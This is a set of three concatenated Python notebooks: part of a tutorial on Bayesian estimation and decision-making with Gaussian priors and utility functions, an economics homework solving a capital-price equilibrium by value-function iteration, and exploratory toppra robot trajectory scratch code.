# 2. With a mixture-of-Gaussians distribution with two bumps, does the peak of the expected loss ever change position on the x-axis for the three different losses?
# 3. Find parameters for a mixture of Gaussians that results in the mean, mode, and median all being distinct (not equal to one another). With this distribution, how does the peak of the expected utility correspond to the mean/median/mode of the probability distribution for each of the three losses?
# 4. When the mixture of Gaussians has two peaks that are exactly the same height, how many modes are there?
#
#
#
# + cellView="form"
# @markdown Execute this cell to enable the widget
widget = interact(loss_plot_switcher,
what_to_plot = widgets.Dropdown(
options=["Gaussian", "Mixture of Gaussians"],
value="Gaussian", description="Distribution: "))
# +
# to_remove explanation
#. 1) No, no matter what parameters we choose for the Gaussian, the peak of the expected
#. utility is the same. In other words, we would choose the same action (provide the same
#. location estimate) for all 3 estimates.
#. 2) Yes, the peak of expected utility is in different locations for each loss when using
#. a mixture of Gaussians distribution.
#. 3) When using mean-squared error, the peak is at the location of the mean. For
#. absolute error, the peak is located at the median. And for zero-one loss, the
#. peaks are at the two mode values.
#. 4) When a distribution has more than one maximum, it is multi-modal! This means
#. it can have more than one mode. You will only ever have one mean and one median.
# -
# You can see that what coordinates you would provide for Astrocat aren't necessarily easy to guess just from the probability distribution. You need the concept of utility/loss and a specific loss function to determine what estimate you should give.
#
# For symmetric distributions, you will find that the mean, median and mode are the same. However, for distributions with *skew*, like the Gamma distribution or the Exponential distribution, these will be different. You will be able to explore more distributions as priors below.
# ## Section 3.2: A more complex loss function
#
# The loss functions we just explored were fairly simple and are often used. However, life can be complicated and in this case, Astrocat cares about both being near the space mouse and avoiding the satellite. This means we need a more complex loss function that captures this!
#
# We know that we want to estimate Astrocat to be closer to the mouse, which is safe and desirable, but further away from the satellite, which is dangerous! So, rather than thinking about the *Loss* function, we will consider a generalized utility function that considers gains and losses that *matter* to Astrocat!
#
# In this case, we can assume that depending on our uncertainty about Astrocat's probable location, we may want to 'guess' that Astrocat is close to 'good' parts of space and further from 'bad' parts of space. We will model these utilities as Gaussian gain and loss regions--and we can assume the width of the Gaussian comes from our uncertainty over where the Space Mouse and satellite are.
#
# Let's explore how this works in the next interactive demo.
#
# ### Interactive demo 3.2: Complicated cat costs
#
# Now that we have explored *Loss* functions that can be used to determine both formal *estimators* and our expected loss given our error, we are going to see what happens to our estimates if we use a generalized utility function.
#
# Questions:
#
# 1. As you change the $\mu$ of Astrocat, what happens to the expected utility?
# 2. Can the EU be exactly zero everywhere?
# 3. Can the EU be zero in a region around Astrocat but positive and negative elsewhere?
# 4. As our uncertainty about Astrocat's position increases, what happens to the expected utility?
# + cellView="form"
# @markdown Execute this cell to enable the widget
widget = interact(plot_simple_utility_gaussian,
mu = FloatSlider(min=-4.0, max=4.0, step=0.01, value=-0.5, description="µ", continuous_update=False),
sigma = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ", continuous_update=False),
mu_g = FloatSlider(min=-4.0, max=4.0, step=0.01, value=1.0, description="µ_gain", continuous_update=False),
mu_c = FloatSlider(min=-4.0, max=4.0, step=0.01, value=-1.0, description="µ_cost", continuous_update=False),
sigma_g = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_gain", continuous_update=False),
sigma_c = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_cost", continuous_update=False))
# +
# to_remove explanation
#. 1) As Astrocat's mean gets closer to the mean of the gain (or loss), the EU becomes dominated
#. by only the gain or loss.
#. 2) Only if the mean and variances of both the gain and loss regions are exactly the same.
#. (Set one of the variances 0.01 more than the other to see this.)
#. 3) If the variances of the gain and loss function are small enough relative to the position
#. of Astrocat, there will be a 'neutral' region. As the variances increase, this will go away.
#. 4) As the uncertainty of Astrocat's location increases (relative to the gain and loss variances),
#. there will be a continuous increase in utility from the peak of the loss region to the peak of the
#. gain region. Also, this will depend on the mean of Astrocat's distribution! The larger the variance
#. the more sensitive the expected utility is to both the gains and losses!
# -
# ---
# # Section 4: Correlation and marginalization
#
# In this section we will explore a two-dimensional Gaussian, often defined as a two-dimensional vector of Gaussian random variables. This is, in essence, the joint distribution of two Gaussian random variables.
#
#
# ## Video 5: Correlation and marginalization
# + cellView="form" colab={"base_uri": "https://localhost:8080/", "height": 517} outputId="530d9b73-7525-4466-a271-be46355f166a"
# @title Video 5: Correlation and marginalization
from IPython.display import YouTubeVideo
video = YouTubeVideo(id='NSDd0kvQtcY', width=854, height=480, fs=1)
print("Video available at https://youtube.com/watch?v=" + video.id)
video
# -
# ## Section 4.1: Correlation
#
# If the two variables in a two-dimensional Gaussian are independent, looking at one tells us nothing about the other. But what if the two variables are correlated (covary)?
#
# The covariance of two Gaussians with means $\mu_X$ and $\mu_Y$ and standard deviations $\sigma_X$ and $\sigma_Y$ is:
#
# $$
# \sigma_{XY} = E[(X-\mu_{X})(Y-\mu_{Y})]
# $$
#
# $E$ here denotes the expected value. So the covariance is the expected value of the random variable X minus the mean of the Gaussian distribution on X times the random variable Y minus the mean of the Gaussian distribution on Y.
#
# The correlation is the covariance normalized so that it ranges from -1 (exactly anticorrelated) to 1 (exactly correlated).
#
# $$
# \rho_{XY} = \frac{\sigma_{XY}}{\sigma_{X}\sigma_{Y}}
# $$
#
# These are key concepts and while we are considering two hidden states (or two random variables), they extend to $N$ dimensional vectors of Gaussian random variables. You will find these used all over computational neuroscience.
#
#
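# The two definitions above can be checked against samples. The means, standard
# deviations, and correlation below are illustrative choices:

```python
import numpy as np

rng = np.random.default_rng(0)
mu_x, mu_y = 1.0, -2.0
sigma_x, sigma_y, rho = 1.0, 2.0, 0.8
cov = [[sigma_x**2, rho * sigma_x * sigma_y],
       [rho * sigma_x * sigma_y, sigma_y**2]]
X, Y = rng.multivariate_normal([mu_x, mu_y], cov, size=200_000).T

# sigma_XY = E[(X - mu_X)(Y - mu_Y)], estimated from the samples
sigma_xy = np.mean((X - X.mean()) * (Y - Y.mean()))
rho_hat = sigma_xy / (X.std() * Y.std())

print(sigma_xy, rho_hat)  # close to the generating values 1.6 and 0.8
```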
# ### Interactive demo 4.1: Covarying 2D Gaussian
#
# Let's explore this 2D Gaussian (i.e. joint distribution of two Gaussians).
#
# Use the following widget to think about the following questions:
#
# 1. If these variables represent hidden states we care about, what does observing one tell us about the other? How does this depend on the correlation?
# 2. How does the shape of the distribution change when we change the means? The variances? The correlation?
# 3. If we want to isolate one or the other hidden state distributions, what do we need to do? (Hint: think about Tutorial 1.)
# + cellView="form"
# @markdown Execute the cell to enable the widget
widget = interact(plot_mvn2d,
mu1 = FloatSlider(min=-1.0, max=1.0, step=0.01, value=0.0, description="µ_1", continuous_update=False),
mu2 = FloatSlider(min=-1.0, max=1.0, step=0.01, value=0.0, description="µ_2", continuous_update=False),
sigma1 = FloatSlider(min=0.1, max=1.5, step=0.01, value=0.5, description="σ_1", continuous_update=False),
sigma2 = FloatSlider(min=0.1, max=1.5, step=0.01, value=0.5, description="σ_2", continuous_update=False),
corr = FloatSlider(min=-0.99, max=0.99, step=0.01, value=0.0, description="ρ", continuous_update=False))
# +
# to_remove explanation
#. 1) The higher the correlation, the more shared information there is. So, the probabilities of the
#. second hidden state are more dependent on the first (and vice versa).
#. 2) The means control only the location! The variances determine the spread in X and Y. The
#. correlation is the only factor that controls the degree of the 'rotation', where we can think
#. about the correlation as forcing the distribution to be more along one of the diagonals or the
#. other.
#. 3) We would need to marginalize! We will do this next.
# -
# ## Section 4.2: Marginalization and information
#
# We learned in Tutorial 1 that if we want to measure the probability of one or another variable, we need to average over the other. When we extend this to the correlated Gaussians we just played with, marginalization works the same way. Let's say that the two variables reflect Astrocat's position in space (in two dimensions). If we want to get our uncertainty about Astrocat's X or Y position, we need to marginalize.
#
# However, let's imagine we have a measurement from one of the variables, for example X, and we want to understand the uncertainty we have in Y. We no longer want to marginalize because we know X, we don't need to ignore it! Instead, we can calculate the conditional probability $P(Y|X=x)$. You will explore the relationship between these two concepts in the following interactive demo.
#
# But first, let's remember that we can also think about the amount of uncertainty as inversely proportional to the amount of information we have about each variable. This is important, because the joint information is determined by the correlation. For our Bayesian approach, the important intuition is that we can also think about the mutual information between the prior and the likelihood following a measurement.
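# For a 2D Gaussian, both the marginal and the conditional distribution have
# closed forms, and we can check them against samples. The parameters below are
# illustrative: conditioning on X = x0 shifts the mean of Y by
# rho * sigma_y / sigma_x * (x0 - mu_x) and shrinks its variance by a factor
# (1 - rho^2), while the marginal of Y is simply N(mu_y, sigma_y^2).

```python
import numpy as np

rng = np.random.default_rng(1)
mu_x, mu_y, sigma_x, sigma_y, rho = 0.0, 0.0, 1.0, 1.5, 0.7
cov = [[sigma_x**2, rho * sigma_x * sigma_y],
       [rho * sigma_x * sigma_y, sigma_y**2]]
xy = rng.multivariate_normal([mu_x, mu_y], cov, size=500_000)

# empirical conditional: keep samples where X is (approximately) x0
x0 = 1.0
y_cond = xy[np.abs(xy[:, 0] - x0) < 0.05, 1]

# closed-form conditional parameters of Y | X = x0
mu_cond = mu_y + rho * sigma_y / sigma_x * (x0 - mu_x)
var_cond = sigma_y**2 * (1 - rho**2)

print(y_cond.mean(), mu_cond)  # both ≈ 1.05
print(y_cond.var(), var_cond)  # both ≈ 1.15: narrower than the marginal's 2.25
```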
#
#
#
#
#
# ### Interactive demo 4.2: Marginalizing 2D Gaussians
#
# Use the following widget to consider the following questions:
#
# 1. When is the marginal distribution the same as the conditional probability distribution? Why?
# 2. If $\rho$ is large, how much information can we gain (in addition) looking at both variables vs just considering one?
# 3. If $\rho$ is close to zero, but the variances of the two variables are very different, what happens to the conditional probability compared to the marginals? As $\rho$ changes?
# + cellView="form"
# @markdown Execute this cell to enable the widget
widget = interact(plot_marginal,
sigma1 = FloatSlider(min=0.1, max=1.1, step=0.01, value=0.5, description="σ_x", continuous_update=False),
sigma2 = FloatSlider(min=0.1, max=1.1, step=0.01, value=0.5, description="σ_y", continuous_update=False),
c_x = FloatSlider(min=-1.0, max=1.0, step=0.01, value=0.0, description="Cx", continuous_update=False),
c_y = FloatSlider(min=-1.0, max=1.0, step=0.01, value=0.0, description="Cy", continuous_update=False),
corr = FloatSlider(min=-1.0, max=1.0, step=0.01, value=0.0, description="ρ", continuous_update=False))
# +
# to_remove explanation
#. 1) The conditional probability distribution is using a measurement to restrict the likely value of
#. one of the variables. If there is correlation, this will also affect what we know (conditionally)
#. about the other! However, the marginal probability *only* depends on the direction along
#. which we are marginalizing. So, when the conditional probability is based on a measurement at the
#. means, it is the same as marginalization, as there is no additional information. A further note
#. is that we can also marginalize along other directions (e.g. a diagonal), but we are not exploring
#. this here.
#. 2) The larger the correlation, the more shared information. So the more we gain about the
#. second variable (or hidden state) by measuring a value from the other.
#. 3) The variable (hidden state) with the lower variance will produce a narrower
#. conditional probability for the other variable! As you shift the correlation, you will see
#. small changes in the variable with the low variance shifting the conditional mean of the
#. variable with the large variance! (So, if X has low variance, changing CY has a big effect.)
# -
# ---
# # Section 5: Bayes' theorem for continuous distributions
#
#
# ## Section 5.1: The Gaussian example
#
# Bayes' rule tells us how to combine two sources of information: the prior (e.g., a noisy representation of Ground Control's expectations about where Astrocat is) and the likelihood (e.g., a noisy representation of the Astrocat after taking a measurement), to obtain a posterior distribution (our belief distribution) taking into account both pieces of information. Remember Bayes' rule:
#
# \begin{eqnarray}
# \text{Posterior} = \frac{ \text{Likelihood} \times \text{Prior}}{ \text{Normalization constant}}
# \end{eqnarray}
#
# We will look at what happens when both the prior and likelihood are Gaussians. In these equations, $\mathcal{N}(\mu,\sigma^2)$ denotes a Gaussian distribution with parameters $\mu$ and $\sigma^2$:
# $$
# \mathcal{N}(\mu, \sigma^2) = \frac{1}{\sqrt{2 \pi \sigma^2}} \; \exp \bigg( \frac{-(x-\mu)^2}{2\sigma^2} \bigg)
# $$
#
#
# When both the prior and likelihood are Gaussians, Bayes' Rule translates into the following form:
#
# $$
# \begin{array}{rcl}
# \text{Likelihood} &=& \mathcal{N}(\mu_{likelihood},\sigma_{likelihood}^2) \\
# \text{Prior} &=& \mathcal{N}(\mu_{prior},\sigma_{prior}^2) \\
# \text{Posterior} &=& \mathcal{N}\left( \frac{\sigma^2_{likelihood}\mu_{prior}+\sigma^2_{prior}\mu_{likelihood}}{\sigma^2_{likelihood}+\sigma^2_{prior}}, \frac{\sigma^2_{likelihood}\sigma^2_{prior}}{\sigma^2_{likelihood}+\sigma^2_{prior}} \right) \\
# &\propto& \mathcal{N}(\mu_{likelihood},\sigma_{likelihood}^2) \times \mathcal{N}(\mu_{prior},\sigma_{prior}^2)
# \end{array}
# $$
#
# We get the parameters of the posterior from multiplying the Gaussians, just as we did in Section 2.2.
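# A minimal check of the update rule above, with illustrative parameters: the
# closed-form posterior mean and variance should match a brute-force
# multiplication of the two PDFs on a grid.

```python
import numpy as np

mu_like, var_like = 0.5, 0.4**2     # likelihood parameters (illustrative)
mu_prior, var_prior = -0.5, 0.8**2  # prior parameters (illustrative)

# closed form: precision-weighted average of means, harmonic sum of variances
mu_post = (var_like * mu_prior + var_prior * mu_like) / (var_like + var_prior)
var_post = var_like * var_prior / (var_like + var_prior)

# brute force: multiply the PDFs on a grid and renormalize
x = np.linspace(-5, 5, 20001)
dx = x[1] - x[0]
gauss = lambda t, m, v: np.exp(-(t - m)**2 / (2 * v)) / np.sqrt(2 * np.pi * v)
post = gauss(x, mu_like, var_like) * gauss(x, mu_prior, var_prior)
post /= post.sum() * dx

print(mu_post, np.sum(x * post) * dx)                   # both ≈ 0.3
print(var_post, np.sum((x - mu_post)**2 * post) * dx)   # both ≈ 0.128
```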
#
#
# ### Interactive Demo 5.1: Gaussian Bayes
# Let's consider the following questions using the following interactive demo:
#
# 1. For a Gaussian posterior, explain how the information seems to be combining. (Hint: think about the prior exercises!)
# 2. What is the difference between the posterior here and the Gaussian that represented the average of two Gaussians in the exercise above?
# 3. How should we think about the relative weighting of information between the prior and posterior?
# + cellView="form"
# @markdown Execute this cell to enable the widget
widget = interact(plot_bayes,
mu1 = FloatSlider(min=-4.0, max=4.0, step=0.01, value=-0.5, description="µ_prior", continuous_update=False),
mu2 = FloatSlider(min=-4.0, max=4.0, step=0.01, value=0.5, description="µ_likelihood", continuous_update=False),
sigma1 = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_prior", continuous_update=False),
sigma2 = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_likelihood", continuous_update=False))
# +
# to_remove explanation
#. 1) We see that the posterior is a weighted average of the prior and likelihood,
#. where the weights correspond to the information in each (or inverse variance).
#. That is, if the prior has lower variance, the mean of the posterior is pulled
#. towards it. If the likelihood has lower variance, the mean of the posterior is
#. pulled towards it.
#. 2) When we simply multiplied the Gaussians, we end up with a true Probability
#. Density Function (PDF)--that is, the integral under the curve is one. However,
#. when we calculate the likelihood * prior, it will look like a Gaussian, but it
#. must be normalized by the marginal likelihood so that the posterior is a true
#. PDF.
#. 3) The prior and posterior can both be thought of as having information, as we
#. described earlier. So this means you can think of the weighting applied to each
#. as proportional to the amount of information each contains. For Gaussians, you
#. know how to calculate this directly.
# -
# ## Section 5.2: Exploring priors
#
# What would happen if we had a different prior distribution for Astrocat's location? Bayes' Rule works exactly the same way if our prior is not a Gaussian (though the analytical solution may be far more complex or impossible). Let's look at how the posterior behaves if we have a different prior over Astrocat's location.
#
# Consider the following questions:
#
# 1. Why does the posterior not look Gaussian when you use a non-Gaussian prior?
# 2. What does having a flat prior mean?
# 3. How does the Gamma prior behave differently than the others?
# 4. From what you know, can you imagine the likelihood being something other than a Gaussian?
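# Grid-based Bayes makes this concrete without any closed-form math. As an
# illustrative sketch (not the widget's implementation), take a skewed
# Gamma(shape=2) prior and a Gaussian likelihood; the posterior is their
# pointwise product, renormalized, and it inherits the prior's hard truncation
# at x = 0.

```python
import numpy as np

x = np.linspace(-2.0, 10.0, 12001)
dx = x[1] - x[0]

# Gamma(shape=2, scale=1) pdf is x * exp(-x) for x >= 0 and 0 otherwise
prior = np.maximum(x, 0.0) * np.exp(-np.maximum(x, 0.0))
# Gaussian likelihood centered at 1 (unnormalized is fine; we renormalize below)
likelihood = np.exp(-0.5 * ((x - 1.0) / 0.8) ** 2)

posterior = prior * likelihood
posterior /= posterior.sum() * dx  # renormalize to a proper PDF on the grid

post_mean = np.sum(x * posterior) * dx
print(post_mean)               # pulled between the prior and the likelihood
print(posterior[x < 0].max())  # exactly 0: the truncation survives
```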
# + cellView="form"
# @markdown Execute this cell to enable the widget
widget = interact(plot_prior_switcher,
what_to_plot = widgets.Dropdown(
options=["Gaussian", "Mixture of Gaussians", "Uniform", "Gamma"],
value="Gaussian", description="Prior: "))
# +
# to_remove explanation
#. 1) If we do not use a Gaussian prior, we will not necessarily have a Gaussian
#. posterior as the type of posterior distribution depends on the types of both the
#. prior and likelihood distributions.
#. 2) A flat prior means you have no helpful prior information coming in: all options are
#. equally likely.
#. 3) The Gamma prior has skew, which is the property of not being symmetric, so, like the
#. mixture of Gaussians, it has different mean, median and mode. But unlike all the other
#. distributions, the Gamma PDF is positive only for x > 0, so it has a hard truncation,
#. even when its parameters cause the values just above x = 0 to be large. In fact, the
#. Exponential distribution, Erlang distribution, and chi-square distribution are
#. special cases of the Gamma distribution. In our example, you can see that the posterior
#. also incorporates the hard truncation.
#. 4) We have only changed the prior, but the prior and the likelihood are just probability
#. distributions. In principle, they can be any properly defined probability distribution.
#. An example that may seem bizarre is the Dirac (delta) function, which is a PDF that has
#. all its probability density in one location, despite being continuous. But in the case
#. of the brain, it's possible that strange likelihood distributions could be used. However,
#. for the same reasons we, as scientists, like exponential family distributions, it may be
#. that evolution selected only ways of representing probability distributions that had useful
#. properties.
# -
# ---
# # Section 6: Bayesian decisions
#
#
# ## Section 6.1: Bayesian estimation on the posterior
#
# Now that we understand that the posterior can be something other than a Gaussian, let's revisit **Loss** functions. In this case, we can see that the posterior can take many forms.
#
#
# ### Interactive Demo 6.1: Standard loss functions with various priors
#
# Questions:
#
# 1. If we have a bi-modal prior, how do the different loss functions potentially inform us differently about what we learn?
# 2. Why do the different loss functions behave differently with respect to the shape of the posterior? When do they produce different expected loss?
# 3. For the mixture of Gaussians, describe the situations where the expected loss will look different from the Gaussian case.
#
# + cellView="form"
# @markdown Execute this cell to enable the widget
widget = interact(plot_bayes_loss_utility_switcher,
what_to_plot = widgets.Dropdown(
options=["Gaussian", "Mixture of Gaussians", "Uniform", "Gamma"],
value="Gaussian", description="Prior: "))
# +
# to_remove explanation
# 1. The minimum of the different loss functions corresponds to the mean, median,
#. and mode of the posterior (just as in Interactive Demo 3). If we have a bi-modal
#. prior, those properties of the posterior can be distinct.
#. 2. The posterior is just another probability distribution, so all the properties we
#. saw in Interactive Demo 3 are true of the posterior too--even though in this case,
#. the posterior inherited the non-symmetric properties from the prior. So, in this
#. example, any prior that itself has a different mean, median and mode will also
#. produce differences across their equivalent loss functions.
#. 3. As long as the posterior probability densities are symmetric around the true mean
#. (hidden state), the MSE and ABS loss functions will look the same as for a Gaussian
#. prior. The mean and the median are the same for symmetric distributions. (When the
#. mean exists--look up the Cauchy distribution.) The mode will be the same as the
#. mean and median when the distribution is unimodal (and therefore when the mixture
#. means are the same). There can also be two modes with the mixture prior!
# -
# ## Section 6.2: Bayesian decisions
#
# Finally, we can combine everything we have learned so far!
#
# Now, let's imagine we have just received a new measurement of Astrocat's location. We need to think about how we want to decide where Astrocat is, so that we can decide how far to tell Astrocat to move. However, we want to account for the satellite and Space Mouse location in this estimation. If we make an error towards the satellite, it's worse than towards Space Mouse. So, we will use our more complex utility function from Section 3.2.
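# Putting the pieces together as a sketch (the grid, widths, and positions below
# are illustrative choices, not the widget's exact parameters): the expected
# utility of announcing location a integrates the posterior against the utility
# of the resulting error, and the Bayesian decision is the a that maximizes it.
# With a gain region on Space Mouse's side of the error axis and a cost region
# on the satellite's side, the best estimate is pushed away from the satellite.

```python
import numpy as np

x = np.linspace(-6.0, 6.0, 1201)
dx = x[1] - x[0]
gauss = lambda t, m, s: np.exp(-0.5 * ((t - m) / s) ** 2) / (s * np.sqrt(2 * np.pi))

# posterior over Astrocat's true location (already combines prior and likelihood)
posterior = gauss(x, 0.0, 0.7)
posterior /= posterior.sum() * dx

def utility_of_error(err):
    # gain region toward Space Mouse (+1), cost region toward the satellite (-1)
    return gauss(err, 1.0, 0.5) - gauss(err, -1.0, 0.5)

# EU(a) = integral p(s) U(a - s) ds, evaluated on the grid of candidate actions
eu = np.array([np.sum(posterior * utility_of_error(a - x)) * dx for a in x])
best_action = x[np.argmax(eu)]
print(best_action)  # positive: shifted toward the gain, away from the cost
```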
#
# ### Interactive Demo 6.2: Complicated cat costs with various priors
#
#
# Questions:
#
# 1. If you have a weak prior and likelihood, how much are you relying on the utility function to guide your estimation?
# 2. If you get a good measurement, that is a likelihood with low variance, how much does this help?
# 3. Which of the factors are most important in making your decision?
# + cellView="form"
# @markdown Execute this cell to enable the widget
widget = interact(plot_utility_gaussian,
mu1 = FloatSlider(min=-4.0, max=4.0, step=0.01, value=-0.5, description="µ_prior", continuous_update=False),
mu2 = FloatSlider(min=-4.0, max=4.0, step=0.01, value=0.5, description="µ_likelihood", continuous_update=False),
sigma1 = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_prior", continuous_update=False),
sigma2 = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_likelihood", continuous_update=False),
mu_g = FloatSlider(min=-4.0, max=4.0, step=0.01, value=1.0, description="µ_gain", continuous_update=False),
mu_c = FloatSlider(min=-4.0, max=4.0, step=0.01, value=-1.0, description="µ_cost", continuous_update=False),
sigma_g = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_gain", continuous_update=False),
sigma_c = FloatSlider(min=0.1, max=2.0, step=0.01, value=0.5, description="σ_cost", continuous_update=False),
plot_utility_row=fixed(True))
# +
# to_remove explanation
# 1) When you have a weak prior and likelihood (high variance for both so not
#. informative), the utility function heavily dictates the shape of the expected utility
#. and final decision (the location of the max of the expected utility).
# 2) How much it helps guide your decision depends on the prior and utility function.
#. If the likelihood is much more informative than the prior (lower variance), it
#. will help clarify your decision of location quite a bit.
# 3) None are always the "most important". It depends on the interplay of all components,
#. especially the information of the prior and likelihood. If you have an informative
#. prior, that will heavily influence the posterior and thus the expected utility.
#. If you have an informative likelihood, that will drive the posterior. And if neither
#. is informative, the utility function becomes very important.
# -
# ---
# # Summary
#
# In this tutorial, you extended your exploration of Bayes' Rule and the Bayesian approach in the context of finding and choosing a location for Astrocat.
#
# Specifically, we covered:
#
# * The Gaussian distribution and its properties
#
# * That the likelihood is the probability of the measurement given some hidden state
#
# * Information shared between Gaussians (via multiplication of PDFs and via two-dimensional distributions)
#
# * That how the prior and likelihood interact to create the posterior, the probability of the hidden state given a measurement, depends on how they covary
#
# * That utility is the gain from each action and state pair, and the expected utility for an action is the sum of the utility for all state pairs, weighted by the probability of that state happening. You can then choose the action with highest expected utility.
#
|
tutorials/W3D1_BayesianDecisions/W3D1_Tutorial2.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
# initial
import time
import numpy as np
z_vec = np.array([1, 2, 5])
z_num = len(z_vec)
z_pdf = np.array([[0.9, 0.05, 0.05],
[0.1, 0.8, 0.1],
[0.15, 0.15, 0.7]])
k_min, k_max, k_num = 0, 50, 250
k_vec = np.linspace(k_min, k_max, k_num)
k_mat = k_vec.reshape(k_num, 1) @ np.ones((1, k_num))
shape = (k_num, z_num)
def vfi(θ=0.6, δ=0.15, β=0.95, p=0.1):
time_begin = time.time()
v_old = np.ones(shape)
v_new = np.zeros(shape)
v_tol = 1e-5
v_ctr = 0
policy = np.zeros(shape, dtype="int")
while np.max(np.abs(v_old - v_new)) > v_tol:
v_old = np.copy(v_new)
for z_curr in range(z_num):
v_expected = z_pdf[z_curr, :] @ v_old.T
π = z_vec[z_curr] * (k_mat ** θ)
d = π + p * (1 - δ) * k_mat - p * k_mat.T
d[d < 0] = -1e10
v_new[:, z_curr] = np.max(d + β * v_expected, 1)
policy[:, z_curr] = np.argmax(d + β * v_expected, 1)
v_ctr += 1
time_end = time.time()
# print("price ::", p)
# print("v_ctr ::", v_ctr)
# print("time ::", time_end - time_begin)
return policy, v_new
def eq(policy):
shape = policy.shape
μ_old = np.zeros(shape)
μ_new = np.ones(shape) / (k_num * z_num)
μ_tol = 1e-5
μ_ctr = 0
while np.max(np.abs(μ_old - μ_new)) > μ_tol:
μ_old = np.copy(μ_new)
μ_new = np.zeros(shape)
for k_curr in range(k_num):
for z_curr in range(z_num):
k_next = policy[k_curr, z_curr]
μ_new[k_next, :] += μ_old[k_curr, z_curr] * z_pdf[z_curr]
μ_ctr += 1
return μ_new
p_h = 50
p_l = 1e-3
p_tol = 1e-5
p_ctr = 0
while p_h - p_l > p_tol:
p_guess = (p_h + p_l) / 2
policy, v_new = vfi(p=p_guess)
μ_invar = eq(policy)
k_demand = np.sum(np.sum(μ_invar, 1) * k_vec)
# print(policy)
# print(μ_invar)
if k_demand > 10:
p_l = p_guess
else:
p_h = p_guess
p_ctr += 1
print("=" * 20)
print("p_guess ::", p_guess)
print("k_demand ::", k_demand)
print("p_ctr ::", p_ctr)
# price = 2.567995539784431
# +
import matplotlib.pyplot as plt
fig, [ax1, ax2] = plt.subplots(nrows=1, ncols=2, figsize=[10, 5], sharex=True)
ax1.plot(v_new)
ax1.set_title("value function")
ax2.plot(policy)
ax2.set_title("policy function")
plt.show()
# +
z_vec = np.array([1, 2, 4])
p_h = 50
p_l = 1e-3
p_tol = 1e-5
p_ctr = 0
while p_h - p_l > p_tol:
p_guess = (p_h + p_l) / 2
policy, v_new = vfi(p=p_guess)
μ_invar = eq(policy)
k_demand = np.sum(np.sum(μ_invar, 1) * k_vec)
# print(policy)
# print(μ_invar)
if k_demand > 10:
p_l = p_guess
else:
p_h = p_guess
p_ctr += 1
print("=" * 20)
print("p_guess ::", p_guess)
print("k_demand ::", k_demand)
print("p_ctr ::", p_ctr)
# price = 2.2654960967302324
|
homework - 3.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import numpy as np
import toppra.dracula as drac
import toppra as ta
import toppra.algorithm as algo
from toppra import constraint
# +
import re
import ast
import numpy as np
def parse_str_arr(s):
a = re.sub(r"([^[])\s+([^]])", r"\1, \2", s)
return np.array(ast.literal_eval(a))
# -
waypts = np.loadtxt('test_waypts_4.txt')
coeff = 1
# V_MAX, A_MAX and _check_waypoints are assumed to be defined earlier in this scratch session
vlim = coeff * np.vstack([-V_MAX, V_MAX]).T
alim = coeff * np.vstack([-A_MAX, A_MAX]).T
min_pair_dist, t_sum = _check_waypoints(waypts, vlim)
t_sum
N_samples = waypts.shape[0]
min_pair_dist, t_sum = _check_waypoints(waypts, vlim)
x = np.linspace(0, 0.15, N_samples) # magic number
path = ta.SplineInterpolator(x, waypts.copy(), bc_type="clamped")
pc_vel = constraint.JointVelocityConstraint(vlim)
pc_acc = constraint.JointAccelerationConstraint(
alim, discretization_scheme=constraint.DiscretizationType.Interpolation
)
instance = algo.TOPPRA(
[pc_vel, pc_acc],
path,
# gridpoints=gridpoints,
solver_wrapper="seidel",
)
jnt_traj = instance.compute_trajectory(0, 0)
jnt_traj.cspl.x
cs = jnt_traj.cspl
x = cs.x
vlim = vlim[:, 1]
vlim
(np.abs(cs.derivative(1)(x))/vlim > 1).any()
data = np.load('/data/toppra/20201204T175646.794406+0000.npz')
waypts = data['waypts']
vlim = data['vlim']
alim = data['alim']
vmax = vlim[:, 1]
amax = alim[:, 1]
waypts = np.array([
[ 0.1088, -1.5201, 1.1266, -2.6961, 1.1851, 1.5092, -1.8498],
[-0.5517, -0.5657, 1.7334, -1.8182, 0.5651, 1.5971, -1.1968],
])
vmax = np.array([0.54375, 0.54375, 0.54375, 0.54375, 0.6525, 0.6525, 0.6525])
amax = np.array([ 3.75, 1.875, 2.5, 3.125, 3.75, 5, 5])
vlim = np.vstack([-vmax, vmax]).T
alim = np.vstack([-amax, amax]).T
cs = RunTopp(waypts, vlim, alim, return_cs=True, verify_lims=True)
order = 1
lim = vlim*0.893
deriv = cs.derivative(order)(cs.x)
deriv[13, 1] *= -1 # debug
i, j = np.where(~((lim[:, 0] < deriv) & (deriv < lim[:, 1])))
signed_lim = np.where(deriv > 0, lim[:, 1], lim[:, 0])
excess = np.sign(deriv) * (deriv - signed_lim) # want the +ve entries
excess_percent = excess / np.abs(signed_lim) # want +ve entries
(np.sign(deriv) * (deriv - signed_lim))[13]
(deriv - signed_lim)[13]
lim
vmax - np.abs(cs.derivative(1)(cs.x))[21,:]
cs = RunTopp(waypts, vlim, alim, return_cspl=True)
new_waypts = cs(cs.x)
new_waypts.shape
new_cs = RunTopp(new_waypts, vlim, alim, return_cspl=True)
# ### crt jnt test
from toppra.dracula import run_topp_spline, _find_waypts_indices
import numpy as np
data = np.load('/data/toppra/input_data/20210114T160131.877605+0000.npz')
waypts_jnt = data['waypts']
vlim_jnt = data['vlim']
alim_jnt = data['alim']
data = np.load('/data/toppra/input_data/20210114T160131.958179+0000.npz')
waypts_crt = data['waypts']
vlim_crt = data['vlim']
alim_crt = data['alim']
cs_jnt = run_topp_spline(
waypts_jnt,
vlim_jnt,
alim_jnt,
verify_lims=True,
return_cs=True,
)
cs_crt = run_topp_spline(
waypts_crt,
vlim_crt,
alim_crt,
verify_lims=True,
return_cs=True,
)
idx_jnt = _find_waypts_indices(waypts_jnt, cs_jnt)
# +
waypts = waypts_jnt
cs = cs_jnt
idx = np.zeros(waypts.shape[0], dtype=int)
k = 0 # index for knots, scan all knots left to right, start at the 0th
